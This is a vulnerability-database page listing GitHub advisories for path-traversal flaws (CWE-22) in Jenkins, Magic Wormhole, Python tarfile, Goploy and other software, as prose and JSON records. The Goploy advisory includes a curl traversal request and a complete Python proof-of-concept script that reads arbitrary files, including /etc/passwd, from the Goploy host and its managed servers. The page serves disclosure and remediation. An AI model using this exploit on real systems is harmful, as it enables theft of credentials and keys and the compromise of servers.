Common Weakness Enumeration

CWE-22

Allowed-with-Review

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Abstraction: Base · Status: Stable

The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

13049 vulnerabilities reference this CWE, most recent first.

GHSA-4G38-HRM4-RG94

Vulnerability from github – Published: 2022-05-24 19:19 – Updated: 2022-12-16 20:21
VLAI
Summary
Multiple vulnerabilities allow bypassing path filtering of agent-to-controller access control in Jenkins
Details

The agent-to-controller security subsystem limits which files on the Jenkins controller can be accessed by agent processes.

Multiple vulnerabilities in the file path filtering implementation of Jenkins 2.318 and earlier, LTS 2.303.2 and earlier allow agent processes to read and write arbitrary files on the Jenkins controller file system, and obtain some information about Jenkins controller file systems.

SECURITY-2444 / CVE-2021-21686: File path filters do not canonicalize paths, allowing operations to follow symbolic links to outside allowed directories.

We expect that most of these vulnerabilities have been present since SECURITY-144 was addressed in the 2014-10-30 security advisory.

Jenkins 2.319, LTS 2.303.3 addresses these security vulnerabilities.

SECURITY-2444 / CVE-2021-21686: File path filters canonicalize paths, preventing operations from following symbolic links to outside allowed directories.

As some common operations are now newly subject to access control, it is expected that plugins sending commands from agents to the controller may start failing. Additionally, the newly introduced path canonicalization means that instances using a custom builds directory (Java system property jenkins.model.Jenkins.buildsDir) or partitioning JENKINS_HOME using symbolic links may fail access control checks. See the documentation for how to customize the configuration in case of problems.

If you are unable to immediately upgrade to Jenkins 2.319, LTS 2.303.3, you can install the Remoting Security Workaround Plugin. It will prevent all agent-to-controller file access using FilePath APIs. Because it is more restrictive than Jenkins 2.319, LTS 2.303.3, more plugins are incompatible with it. Make sure to read the plugin documentation before installing it.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c 2.303.2"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "org.jenkins-ci.main:jenkins-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.303.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.318"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "org.jenkins-ci.main:jenkins-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.304"
            },
            {
              "fixed": "2.319"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-21686"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-59"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-06-23T06:49:09Z",
    "nvd_published_at": "2021-11-04T17:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "The agent-to-controller security subsystem limits which files on the Jenkins controller can be accessed by agent processes.\n\nMultiple vulnerabilities in the file path filtering implementation of Jenkins 2.318 and earlier, LTS 2.303.2 and earlier allow agent processes to read and write arbitrary files on the Jenkins controller file system, and obtain some information about Jenkins controller file systems.\n\nSECURITY-2444 / CVE-2021-21686: File path filters do not canonicalize paths, allowing operations to follow symbolic links to outside allowed directories.\n\nWe expect that most of these vulnerabilities have been present since [SECURITY-144 was addressed in the 2014-10-30 security advisory](https://www.jenkins.io/security/advisory/2014-10-30/).\n\nJenkins 2.319, LTS 2.303.3 addresses these security vulnerabilities.\n\nSECURITY-2444 / CVE-2021-21686: File path filters canonicalize paths, preventing operations from following symbolic links to outside allowed directories.\n\nAs some common operations are now newly subject to access control, it is expected that plugins sending commands from agents to the controller may start failing. Additionally, the newly introduced path canonicalization means that instances using a custom builds directory ([Java system property jenkins.model.Jenkins.buildsDir](https://www.jenkins.io/doc/book/managing/system-properties/#jenkins-model-jenkins-buildsdir)) or partitioning `JENKINS_HOME` using symbolic links may fail access control checks. See [the documentation](https://www.jenkins.io/doc/book/security/controller-isolation/agent-to-controller/#file-access-rules) for how to customize the configuration in case of problems.\n\nIf you are unable to immediately upgrade to Jenkins 2.319, LTS 2.303.3, you can install the [Remoting Security Workaround Plugin](https://www.jenkins.io/redirect/remoting-security-workaround/). It will prevent all agent-to-controller file access using `FilePath` APIs. Because it is more restrictive than Jenkins 2.319, LTS 2.303.3, more plugins are incompatible with it. Make sure to read the plugin documentation before installing it.",
  "id": "GHSA-4g38-hrm4-rg94",
  "modified": "2022-12-16T20:21:31Z",
  "published": "2022-05-24T19:19:45Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21686"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jenkinsci/jenkins/commit/104c751d907919dd53f5090f84d53c671a66457b"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jenkinsci/jenkins/commit/5a245e42979abe4a26d41727c839521e36cedd74"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jenkinsci/jenkins/commit/63cde2daadc705edf086f2213b48c8c547f98358"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/jenkinsci/jenkins"
    },
    {
      "type": "WEB",
      "url": "https://www.jenkins.io/security/advisory/2021-11-04/#SECURITY-2455"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Multiple vulnerabilities allow bypassing path filtering of agent-to-controller access control in Jenkins"
}

GHSA-4G43-JCGP-9P5G

Vulnerability from github – Published: 2022-05-24 19:09 – Updated: 2022-05-24 19:09
VLAI
Details

Improper limitation of a pathname to a restricted directory vulnerabilities in FortiSandbox 3.2.0 through 3.2.2, and 3.1.0 through 3.1.4 may allow an authenticated user to obtain unauthorized access to files and data via specifially crafted web requests.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-24010"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-08-04T15:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Improper limitation of a pathname to a restricted directory vulnerabilities in FortiSandbox 3.2.0 through 3.2.2, and 3.1.0 through 3.1.4 may allow an authenticated user to obtain unauthorized access to files and data via specifially crafted web requests.",
  "id": "GHSA-4g43-jcgp-9p5g",
  "modified": "2022-05-24T19:09:59Z",
  "published": "2022-05-24T19:09:59Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-24010"
    },
    {
      "type": "WEB",
      "url": "https://fortiguard.com/advisory/FG-IR-20-202"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-4G4C-MFQG-PJ8R

Vulnerability from github – Published: 2026-03-13 15:40 – Updated: 2026-03-13 15:40
VLAI
Summary
Magic Wormhole: "wormhole receive" allows arbitrary local file overwrite
Details

Impact

What kind of vulnerability is it? Who is impacted?

Receiving a file (wormhole receive) from a malicious party could result in overwriting critical local files, including ~/.ssh/authorized_keys and .bashrc. This could be used to compromise the receiver's computer.

Only the sender of the file (the party who runs wormhole send) can mount the attack. Other parties (including the transit/relay servers) are excluded by the wormhole protocol.

Patches

Has the problem been patched? What versions should users upgrade to?

The bug has been fixed in magic-wormhole 0.23.0. All users should upgrade to this version.

The vulnerability first surfaced in the 0.21.0 release on 23-Oct-2025.

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

As a workaround, the receiver can override the sender's filename with the --output or -o option. For example: wormhole receive -o shopping-list.txt will write the file to shopping-list.txt in the local directory, regardless of what the sender tries to do. To be effective, this option must be added to every invocation of wormhole receive / wormhole rx.

References

Are there any links users can visit to find out more?

Incoming file transfer requests include a filename, used to decide where the file contents will be written. Well-behaving senders compute this from the basename() of the sent file (which discards all but the last segment of the path). To guard against malicious senders, the receiver also applies basename() to the incoming filename. During refactoring in version 0.21.0, this receiver-side check was accidentally dropped. The check was restored in version 0.23.0 along with a unit test.

Many thanks to Ian McKenzie (@ikmckenz) for spotting the bug and reaching out with a fix.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "magic-wormhole"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.21.0"
            },
            {
              "fixed": "0.23.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32116"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-13T15:40:20Z",
    "nvd_published_at": "2026-03-12T18:16:24Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nReceiving a file (`wormhole receive`) from a malicious party could result in overwriting critical local files, including `~/.ssh/authorized_keys` and `.bashrc`. This could be used to compromise the receiver\u0027s computer.\n\nOnly the sender of the file (the party who runs `wormhole send`) can mount the attack. Other parties (including the transit/relay servers) are excluded by the wormhole protocol.\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\nThe bug has been fixed in magic-wormhole 0.23.0. All users should upgrade to this version.\n\nThe vulnerability first surfaced in the 0.21.0 release on 23-Oct-2025.\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\nAs a workaround, the receiver can override the sender\u0027s filename with the `--output` or `-o` option. For example: `wormhole receive -o shopping-list.txt` will write the file to `shopping-list.txt` in the local directory, regardless of what the sender tries to do. To be effective, this option must be added to every invocation of `wormhole receive` / `wormhole rx`.\n\n### References\n_Are there any links users can visit to find out more?_\n\nIncoming file transfer requests include a `filename`, used to decide where the file contents will be written. Well-behaving senders compute this from the `basename()` of the sent file (which discards all but the last segment of the path). To guard against malicious senders, the receiver also applies `basename()` to the incoming filename. During refactoring in version 0.21.0, this receiver-side check was accidentally dropped. The check was restored in version 0.23.0 along with a unit test.\n\nMany thanks to Ian McKenzie (@ikmckenz) for spotting the bug and reaching out with a fix.",
  "id": "GHSA-4g4c-mfqg-pj8r",
  "modified": "2026-03-13T15:40:20Z",
  "published": "2026-03-13T15:40:20Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/magic-wormhole/magic-wormhole/security/advisories/GHSA-4g4c-mfqg-pj8r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32116"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/magic-wormhole/magic-wormhole"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Magic Wormhole: \"wormhole receive\" allows arbitrary local file overwrite"
}

GHSA-4G4G-FQW4-PRP2

Vulnerability from github – Published: 2025-06-03 15:31 – Updated: 2025-06-05 15:31
VLAI
Details

Allows the extraction filter to be ignored, allowing symlink targets to point outside the destination directory, and the modification of some file metadata.

You are affected by this vulnerability if using the tarfile module to extract untrusted tar archives using TarFile.extractall() or TarFile.extract() using the filter= parameter with a value of "data" or "tar". See the tarfile extraction filters documentation https://docs.python.org/3/library/tarfile.html#tarfile-extraction-filter  for more information. Only Python versions 3.12 or later are affected by these vulnerabilities, earlier versions don't include the extraction filter feature.

Note that for Python 3.14 or later the default value of filter= changed from "no filtering" to `"data", so if you are relying on this new default behavior then your usage is also affected.

Note that none of these vulnerabilities significantly affect the installation of source distributions which are tar archives as source distributions already allow arbitrary code execution during the build process. However when evaluating source distributions it's important to avoid installing source distributions with suspicious links.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-4138"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-06-03T13:15:20Z",
    "severity": "HIGH"
  },
  "details": "Allows the extraction filter to be ignored, allowing symlink targets to point outside the destination directory, and the modification of some file metadata.\n\n\nYou are affected by this vulnerability if using the tarfile\u00a0module to extract untrusted tar archives using TarFile.extractall()\u00a0or TarFile.extract()\u00a0using the filter=\u00a0parameter with a value of \"data\"\u00a0or \"tar\". See the tarfile  extraction filters documentation https://docs.python.org/3/library/tarfile.html#tarfile-extraction-filter \u00a0for more information. Only Python versions 3.12 or later are affected by these vulnerabilities, earlier versions don\u0027t include the extraction filter feature.\n\nNote that for Python 3.14 or later the default value of filter=\u00a0changed from \"no filtering\" to `\"data\", so if you are relying on this new default behavior then your usage is also affected.\n\nNote that none of these vulnerabilities significantly affect the installation of source distributions which are tar archives as source distributions already allow arbitrary code execution during the build process. However when evaluating source distributions it\u0027s important to avoid installing source distributions with suspicious links.",
  "id": "GHSA-4g4g-fqw4-prp2",
  "modified": "2025-06-05T15:31:30Z",
  "published": "2025-06-03T15:31:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4138"
    },
    {
      "type": "WEB",
      "url": "https://github.com/python/cpython/issues/135034"
    },
    {
      "type": "WEB",
      "url": "https://github.com/python/cpython/pull/135037"
    },
    {
      "type": "WEB",
      "url": "https://github.com/python/cpython/commit/19de092debb3d7e832e5672cc2f7b788d35951da"
    },
    {
      "type": "WEB",
      "url": "https://github.com/python/cpython/commit/28463dba112af719df1e8b0391c46787ad756dd9"
    },
    {
      "type": "WEB",
      "url": "https://github.com/python/cpython/commit/3612d8f51741b11f36f8fb0494d79086bac9390a"
    },
    {
      "type": "WEB",
      "url": "https://github.com/python/cpython/commit/4633f3f497b1ff70e4a35b6fe2c907cbe2d4cb2e"
    },
    {
      "type": "WEB",
      "url": "https://github.com/python/cpython/commit/9c1110ef6652687d7c55f590f909720eddde965a"
    },
    {
      "type": "WEB",
      "url": "https://github.com/python/cpython/commit/9e0ac76d96cf80b49055f6d6b9a6763fb9215c2a"
    },
    {
      "type": "WEB",
      "url": "https://github.com/python/cpython/commit/aa9eb5f757ceff461e6e996f12c89e5d9b583b01"
    },
    {
      "type": "WEB",
      "url": "https://github.com/python/cpython/commit/dd8f187d0746da151e0025c51680979ac5b4cfb1"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/sethmlarson/52398e33eff261329a0180ac1d54f42f"
    },
    {
      "type": "WEB",
      "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/MAXIJJCUUMCL7ATZNDVEGGHUMQMUUKLG"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4G4W-JRFJ-2M5P

Vulnerability from github – Published: 2024-11-14 12:31 – Updated: 2024-11-14 12:31
VLAI
Details

Boa web server - CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-47916"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-11-14T10:15:07Z",
    "severity": "HIGH"
  },
  "details": "Boa web server - CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
  "id": "GHSA-4g4w-jrfj-2m5p",
  "modified": "2024-11-14T12:31:00Z",
  "published": "2024-11-14T12:31:00Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47916"
    },
    {
      "type": "WEB",
      "url": "https://www.gov.il/en/Departments/faq/cve_advisories"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4G5H-VP8C-MRHF

Vulnerability from github – Published: 2021-12-15 00:00 – Updated: 2021-12-23 00:02
VLAI
Details

SAF-T Framework Transaction SAFTN_G allows an attacker to exploit insufficient validation of path information provided by normal user, leading to full server directory access. The attacker can see the whole filesystem structure but cannot overwrite, delete, or corrupt arbitrary files on the server.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-44232"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-12-14T16:15:00Z",
    "severity": "HIGH"
  },
  "details": "SAF-T Framework Transaction SAFTN_G allows an attacker to exploit insufficient validation of path information provided by normal user, leading to full server directory access. The attacker can see the whole filesystem structure but cannot overwrite, delete, or corrupt arbitrary files on the server.",
  "id": "GHSA-4g5h-vp8c-mrhf",
  "modified": "2021-12-23T00:02:14Z",
  "published": "2021-12-15T00:00:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44232"
    },
    {
      "type": "WEB",
      "url": "https://launchpad.support.sap.com/#/notes/3124094"
    },
    {
      "type": "WEB",
      "url": "https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+December+2021"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-4G5X-HCWM-82JW

Vulnerability from github – Published: 2026-07-07 23:42 – Updated: 2026-07-07 23:42
VLAI
Summary
Goploy: Arbitrary File Read via Path Traversal in /deploy/fileDiff allows Remote Server Compromise
Details

Click here to jump to the Simplified Chinese version (点击跳转到简体中文版本)

Goploy System Arbitrary File Read Vulnerability

Basic Information

  • Vulnerability Name: Goploy Endpoints Arbitrary File Read via Path Traversal
  • Vulnerability Type: Path Traversal (CWE-22) / Arbitrary File Read
  • Affected Product: Goploy
  • Severity Level: High (CVSS V3 7.7)
  • Known Affected Versions: <=1.17.5

Vulnerability Description

Goploy is an open-source automation deployment system. A severe path traversal vulnerability exists in its backend API endpoints, specifically /deploy/fileDiff (File Compare), when handling file paths provided by the client.

The original logic of this endpoint is to read a local project file and compare it with a file on a remote target server. However, due to insufficient validation and sanitization of the filePath parameter, and the lack of security constraints on the final absolute file path, malicious paths containing ../ are directly executed within the system.

This leads to a dual arbitrary file read issue: 1. Local Host File Read: os.ReadFile is tricked by the directory traversal payload to read any file via its absolute path on the Goploy local host (returned in the srcText field of the response body). 2. Remote Controlled Server File Read: Subsequently, the same payload is utilized via the SFTP protocol on the target server pointed to by the serverID. Influenced similarly by the directory traversal, it reads any file on the configured remote server (returned in the distText field of the response body).

The threshold for exploiting this vulnerability is extremely low, and the conditions are very easily met. The system comes with a built-in member role upon default installation, which is granted the "File Compare" permission by default. This means that as long as a normal low-privileged user is added to the system, they inherently possess the basic privileges required to call the vulnerable endpoint. The only prerequisite for the attack is that at least one project and one associated server are configured in the system.

An attacker only needs to specify the correct namespace header (e.g., G-N-ID: 1) via a packet capture tool to bypass simple restrictions. By enumerating available serverId parameters, the attacker can successfully execute path traversal via this endpoint, reading arbitrary files on both the local Goploy host and all remote target servers managed by Goploy.

Steps to Reproduce (Proof of Concept)

Theoretical Steps (See concrete steps below)

  1. Obtain Normal User Privileges Log in to the system using any registered low-privileged account to obtain valid authentication credentials (Cookie/Token) and its corresponding authorized Namespace ID.

  2. Construct Malicious Request Send a POST request containing the directory traversal characters ../ to the target endpoint /deploy/fileDiff, while including the G-N-ID header.

PoC Example (Reading /etc/passwd and enumerating serverId): bash curl -s -X POST -b "goploy_token=<valid_cookie>" \ -H "Content-Type: application/json" \ -H "G-N-ID: 1" \ -d '{"projectId":1,"serverId":1,"filePath":"../../../../../../../../../../etc/passwd"}' \ "http://<target-host>/deploy/fileDiff" 3. Reproduction Result The server will return the complete contents of the /etc/passwd file from both the host and the remote server.

Concrete Steps

  1. Environment Setup Published an arbitrary project using the super admin account:

    image

    Configured two managed remote servers:

    image-1(1)

    Created a normal user and assigned the member role (which includes File Compare permission):

    image-2

    image-3

  2. Obtain Normal User Privileges Log in to the system using the registered test account to obtain valid authentication credentials (Cookie/Token).

    image-4(1)

  3. Execute poc.py (See below)

    • Parameter Explanation: -u : Target URL -t : Target Cookie/Token to use -f : File to read -s : ID of the managed server to read from

    • Reading from the first managed server (Server ID: 1): bash python poc.py -u http://192.168.x.x:8080 -t eyJhbGxxxxxxxxxx... -f /etc/passwd -s 1

    image-6(1)

    image-5

    • Reading from the second managed server (Server ID: 2): bash python poc.py -u http://192.168.x.x:8080 -t eyJhbGxxxxxxxxxx... -f /etc/passwd -s 2

    image-8(1)

  4. Reproduction Result The server successfully returns the full contents of the /etc/passwd file from both the Goploy host and the designated remote servers.

Impact

Through this vulnerability, an attacker can bypass authorization to read any sensitive files on the host machine as well as all managed target servers. For example: - Read /etc/passwd or /etc/shadow on the local or remote target servers to obtain host system user information. - Read users' SSH private keys (e.g., ~/.ssh/id_rsa) across different systems, enabling passwordless SSH access to the host or cross-network connections to other servers to steal administrative control, achieving the equivalent of Remote Code Execution (RCE). - By enumerating the serverID, an attacker can use Goploy as a jump server (bastion host) to conduct large-scale information theft against all bound deployment target systems. - Obtain various critical configuration files, database credentials, etc., of the affected systems.

Remediation Suggestions

  1. Input Parameter Filtering: Strictly filter special characters such as ../, ..\, and %00 that can cause directory traversal and truncation when receiving and processing file paths provided by clients.
  2. Path Whitelist Constraints: Use built-in functions like filepath.Clean to format the path. Before executing system file read/write operations, strictly verify whether the parsed absolute path prefix is within the legitimate restricted directory scope allowed by the application (such as a preset sandbox directory or project workspace).
  3. Principle of Least Privilege: The environment or Docker container running the Goploy service should be executed with low-privileged user identities whenever possible, to mitigate the risk of sensitive system files being read.
  4. Comprehensive API Audit: Apart from the APIs mentioned above, there are multiple other APIs that suffer from similar path traversal vulnerabilities. If users obtain the corresponding permissions, it can lead to arbitrary file reads or even writes.

poc.py

#!/usr/bin/env python3
import requests
import argparse
import sys
import urllib3
import json

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def banner():
    print(r"""
  ____             _               ____       ____ 
 / ___| ___  _ __ | | ___  _   _  |  _ \ ___ / ___|
| |  _ / _ \| '_ \| |/ _ \| | | | | |_) / _ \ |    
| |_| | (_) | |_) | | (_) | |_| | |  __/ (_) | |___ 
 \____|\___/| .__/|_|\___/ \__, | |_|   \___/ \____|
            |_|            |___/                    

    Goploy Authenticated Arbitrary File Read PoC
    """)

def exploit(target_url, token, file_read, args):
    if not target_url.startswith("http"):
        target_url = "http://" + target_url

    target_url = target_url.rstrip('/')

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
    }

    cookies = {
        "goploy_token": token
    }

    print("[*] 正在尝试自动从服务器响应中提取利用所需的所有参数ID...")

    # 1. 动态获取可用的 Namespace ID
    namespace_id = 1
    print(f"[*] 1. 尝试获取可用的 Namespace ID (/namespace/getOption)")
    try:
        r_ns = requests.get(f"{target_url}/namespace/getOption", headers=headers, cookies=cookies, verify=False, timeout=10)
        ns_data = r_ns.json()
        if ns_data.get("code") == 0 and len(ns_data.get("data", {}).get("list", [])) > 0:
            namespace_id = ns_data["data"]["list"][0]["namespaceId"]
            print(f"[+] 成功提取到 Namespace ID: {namespace_id}")
        else:
            print(f"[-] 提取 Namespace ID 失败或列表为空,将降级使用默认值 1")
    except Exception as e:
        print(f"[-] 提取 Namespace ID 发生异常: {e}")

    # 将获取到的 Namespace ID 放入后续请求的 Header 中
    headers["G-N-ID"] = str(namespace_id)

    # 2. 动态获取可用的 Server ID
    server_id = 1
    if args.server_id is not None:
        server_id = int(args.server_id)
        print(f"[*] 2. 用户指定了 Server ID: {server_id} ,跳过自动探测。可用于水平提权目标网络!")
    else:
        print(f"[*] 2. 尝试获取可用的 Server ID (/server/getOption)")
        try:
            r_srv = requests.get(f"{target_url}/server/getOption", headers=headers, cookies=cookies, verify=False, timeout=10)
            srv_data = r_srv.json()
            if srv_data.get("code") == 0 and len(srv_data.get("data", {}).get("list", [])) > 0:
                server_id = srv_data["data"]["list"][0]["id"]
                print(f"[+] 成功提取到可用 Server ID: {server_id}")
            else:
                print(f"[-] 提取 Server ID 失败或列表为空,将降级尝试猜测值 1")
        except Exception as e:
            print(f"[-] 提取 Server ID 发生异常: {e}")

    # 3. 动态获取可用的 Project ID
    project_id = 1
    print(f"[*] 3. 尝试获取可用的 Project ID (/deploy/getList)")
    try:
        r_proj = requests.get(f"{target_url}/deploy/getList", headers=headers, cookies=cookies, verify=False, timeout=10)
        proj_data = r_proj.json()
        if proj_data.get("code") == 0 and len(proj_data.get("data", {}).get("list", [])) > 0:
            project_id = proj_data["data"]["list"][0]["id"]
            print(f"[+] 成功提取到 Project ID: {project_id}")
        else:
            print(f"[-] 提取 Project ID 失败或列表为空,将降级尝试猜测值 1")
    except Exception as e:
        print(f"[-] 提取 Project ID 发生异常: {e}")

    # ==========================
    # 4. 执行漏洞利用
    # ==========================
    headers["Content-Type"] = "application/json"

    # 构造目录穿越 payload
    traversal_payload = "../" * 15 + file_read.lstrip('/')

    data = {
        "projectId": project_id,
        "serverId": server_id,
        "filePath": traversal_payload
    }

    url_exploit = f"{target_url}/deploy/fileDiff"
    print(f"\n[*] 目标地址: {url_exploit}")
    print(f"[*] Payload中包含的系统参数: NamespaceID={namespace_id}, ProjectID={project_id}, ServerID={server_id}")
    print(f"[*] 尝试读取文件: {file_read}")
    print(f"[*] 发送最终利用请求中...\n")

    try:
        response = requests.post(url_exploit, headers=headers, cookies=cookies, json=data, verify=False, timeout=10)

        if response.status_code == 200:
            try:
                # 尝试解析 Goploy 的 JSON 回显格式
                json_data = response.json()
                if json_data.get('code') in [0, 1, 2]: # 有时候读取回显为完整的 json 
                    data_obj = json_data.get('data') if isinstance(json_data.get('data'), dict) else {}

                    src_text = data_obj.get('srcText', '')
                    dist_text = data_obj.get('distText', '')

                    if src_text or dist_text:
                        print("[+] 漏洞利用成功!产生双重文件读取响应:\n")
                        print("=" * 50)
                        print(f"【Goploy宿主机 ({url_exploit} 本地) 的文件内容记录在 srcText】:")
                        print("-" * 50)
                        print(src_text if src_text else "(空)")
                        print("=" * 50)
                        print(f"【被控目标端服务器 (ServerID: {server_id}) 的文件内容记录在 distText】:")
                        print("-" * 50)
                        print(dist_text if dist_text else "(空)")
                        print("=" * 50)
                    else:
                        print("[-] 读取操作执行但未返回具体的 srcText 或 distText 数据。正在显示原始 API 返回:")
                        print(json.dumps(json_data, indent=2))
                else:
                    print(f"[-] 服务器返回业务错误 (Code={json_data.get('code')}): {json_data.get('message')}")
            except ValueError:
                # 如果不是 JSON 格式,直接输出响应源码
                print("[+] 收到未知格式响应,以下为原始正文内容:")
                print(response.text)
        else:
            print(f"[-] HTTP 请求失败,HTTP 状态码: {response.status_code}")
            print(response.text)

    except requests.exceptions.RequestException as e:
        print(f"[-] 连接出错: {e}")

if __name__ == "__main__":
    banner()
    parser = argparse.ArgumentParser(description="Goploy 任意文件读取概念验证脚本 (PoC)")
    parser.add_argument("-u", "--url", required=True, help="目标系统基础 URL,例如:http://192.168.240.130")
    parser.add_argument("-t", "--token", required=True, help="具有低权限成员账户的 goploy_token (Cookie)")
    parser.add_argument("-f", "--file", default="/etc/passwd", help="想要读取的目标绝对路径文件 (默认: /etc/passwd)")
    parser.add_argument("-s", "--server_id", default=None, help="强制指定想要读取的远程绑定服务器ServerID(如忽略则尝试自动获取首个)")

    args = parser.parse_args()

    exploit(args.url, args.token, args.file, args)


Goploy 系统任意文件读取

漏洞基本信息

  • 漏洞名称:Goploy 系统端点任意文件读取漏洞
  • 漏洞类型:路径遍历(Path Traversal, CWE-22) / 任意文件读取
  • 影响产品:Goploy
  • 漏洞危害级别:高危(CVSS V3 7.7)
  • 已知影响版本:<=1.17.5

漏洞描述

Goploy 是一个开源的自动化部署系统。在其后端服务的 /deploy/fileDiff(文件对比)等 API 接口处处理客户端传来的文件路径时,存在严重的路径遍历漏洞。

该接口的原始逻辑是读取本地项目文件与远程目标服务器文件进行比对。但由于未能充分校验及过滤用户传入的 filePath 参数,也没有对最终的文件绝对路径进行安全约束,将含有 ../ 的恶意路径直接带入系统中执行。 这导致了一个双重任意文件读取的问题: 1. 本地宿主机文件读取:os.ReadFile 会被目录穿越 payload 欺骗,读取出 Goploy 宿主机的本地绝对路径任意文件(返回在响应体的 srcText 字段)。 2. 远程任意受控服务器文件读取:紧接着该 payload 经由 SFTP 协议作用于 serverID 所指向的目标服务器,同样由于受到目录穿越影响,最终读取所配置远程服务器上的任意文件(返回在响应体的 distText 字段)。

该漏洞利用门槛极低且条件极易满足。 系统在默认安装时预设了 member(普通成员)角色,且默认赋予了该角色“文件比对 (FileCompare)”权限。这意味着系统只要添加了一个普通的低权限使用者,其天然就具备调用目标漏洞端点的基础权限。攻击前提仅仅是系统中配置了至少一个项目和一个服务器。

攻击者仅需通过抓包指定正确的命名空间 Header(例如 G-N-ID: 1)绕过其简单的限制拦截,且遍历可用的 serverId 参数,即可直接利用该端点成功执行路径遍历,读取 Goploy 本地宿主机以及各个远端被 Goploy 管理的目标服务器上的任意文件

漏洞复现步骤 (Proof of Concept)

理论步骤(具体步骤见下)

  1. 获取普通用户权限 使用任意已注册的低权限账户登录系统,获取有效的身份认证凭证(Cookie/Token)。获取其对应有权限的 Namespace ID。

  2. 构造恶意请求 向目标接口 /deploy/fileDiff 发送包含目录穿越字符 ../ 的 POST 请求,并携带 G-N-ID

PoC 示例(读取 /etc/passwd,可以遍历serverId): bash curl -s -X POST -b "goploy_token=<用户的有效cookie>" \ -H "Content-Type: application/json" \ -H "G-N-ID: 1" \ -d '{"projectId":1,"serverId":1,"filePath":"../../../../../../../../../../etc/passwd"}' \ "http://<target-host>/deploy/fileDiff" 2. 复现结果 服务器将返回宿主机和远端服务器 /etc/passwd 文件的完整内容。

具体步骤

